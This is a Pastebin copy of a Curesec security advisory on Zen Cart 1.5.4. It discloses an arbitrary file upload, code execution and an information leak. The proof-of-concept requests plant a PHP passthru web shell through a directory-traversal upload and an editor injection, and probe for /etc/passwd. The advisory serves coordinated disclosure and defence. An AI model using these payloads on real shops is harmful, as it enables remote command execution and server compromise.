Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Zen Cart 1.5.4: Code Execution and Information Leak
- Security Advisory – Curesec Research Team
- 1. Introduction
- Affected Product: Zen Cart 1.5.4
- Fixed in: partial fix via patch
- Partial Patch Link:
- https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included
- Vendor Contact: security@zen-cart.com
- Vulnerability Type: Code Execution and Information Leak
- Remote Exploitable: Yes
- Reported to vendor: 08/13/2015
- Disclosed to public: 09/14/2015
- Release mode: Coordinated release
- CVE: n/a
- Credits Tim Coen of Curesec GmbH
- 2. Vulnerability Description: Arbitrary File Upload
- When uploading an image for a record, there is no check as to what type
- or extension the file has, with the exception that it cannot be a
- htaccess file. These files are stored in the /image directory, which is
- protected from code execution via a htaccess file if the server is not
- prevented from parsing htaccess files correctly (which may for example
- be the case for speed and security reasons).
- An attacker can perform a directory traversal via the img_dir POST
- parameter to store an uploaded image outside of this protected
- directory, thus gaining code execution or overwriting sensitive files,
- even if the image directory is protected by the htaccess file.
- The recommendations for denying code execution listed in the help-page
- "Important Site Security Recommendations" - such as protecting the
- /image and /html_includes folders against file modification and
- execution - do not protect against code execution via this attack.
- This problem exists for other classes performing file operations as
- well, such as media_manager.php, manufacturers.php,
- attributes_controller.php, mail.php, new_product_preview.php,
- record_company.php, product_types.php, and categories.php.
- Please note that an admin account is required that has the right to edit
- one of the items that provide an image upload, such as the right
- "Catalog: Product Types" or "Extra: Record Artists"
- 3. Proof of Concept: Arbitrary File Upload
- The request to upload a file may look like this:
- POST
- /zen-cart-v1.5.4-12302014/admin2/record_artists.php?page=1&mID=1&action=save
- HTTP/1.1
- Host: localhost
- ----------1358192638
- Content-Disposition: form-data; name="securityToken"
- 30bb3768c3aa1120ccae02eca8ec8a4b
- ----------1358192638
- Content-Disposition: form-data; name="artists_name"
- The Russ Tippins Band
- ----------1358192638
- Content-Disposition: form-data; name="artists_image";
- filename="test.php"
- Content-Type: application/x-php
- <?php
- passthru($_GET['x']);
- ----------1358192638
- Content-Disposition: form-data; name="img_dir"
- dvd/../../
- ----------1358192638
- Content-Disposition: form-data; name="artists_url[1]"
- www.russtippins.com/
- ----------1358192638
- Content-Disposition: form-data; name="x"
- 37
- ----------1358192638
- Content-Disposition: form-data; name="y"
- 9
- ----------1358192638--
- 4. Further
- Code Execution
- With an admin account with the right "Tools: Define Pages Editor" it is
- possible to edit a limited number of PHP files which mainly contain HTML
- here:
- http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=4&action=new_page.
- Execution of these files is prohibited via htaccess files, so with
- correct server configuration, the intention seems to be that an attacker
- should not be able to gain code execution via this editor.
- However, the protection against code execution is insufficient, as any
- injected code will be executed once the file is included. For example:
- visit
- http://localhost/zen-cart-v1.5.4-12302014/admin2/define_pages_editor.php?define_it=8&action=new_page
- add <?php passthru($_GET['e']); ?>
- visit
- http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=nonexistent&cPath=2&e=ls%20-alF
- Please note that if the user followed the guide "Important Site Security
- Recommendations", they will have set these files to read-only,
- disallowing code execution.
- Information Leak
- Via a directory traversal on the products_image_large_additional
- parameter, an attacker can check if a file exists on the server, thus
- gaining information about installed software. Viewing of the file is not
- possible.
- Example:
- http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd
- results in
- <a href="javascript:window.close()"><img
- src="../../../../../../../etc/passwd"
- http://localhost/zen-cart-v1.5.4-12302014/index.php?main_page=popup_image_additional&pID=26&pic=1&products_image_large_additional=../../../../../../../etc/passwd2
- results in default image being shown
- 5. Solution
- To mitigate the information leak a patch can be used:
- https://www.zen-cart.com/showthread.php?218239-curesec-security-report-Patch-Included
- The Arbitrary File Upload vulnerability has not been fixed yet.
- 6. Report Timeline
- 08/13/2015 Informed Vendor about Issue
- 09/12/2015 Vendor releases report and partial fix
- 09/14/2015 Disclosed to public
- 7. Blog Reference:
- http://blog.curesec.com/article/blog/Zen-Cart-154-Code-Execution-and-Information-Leak-54.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement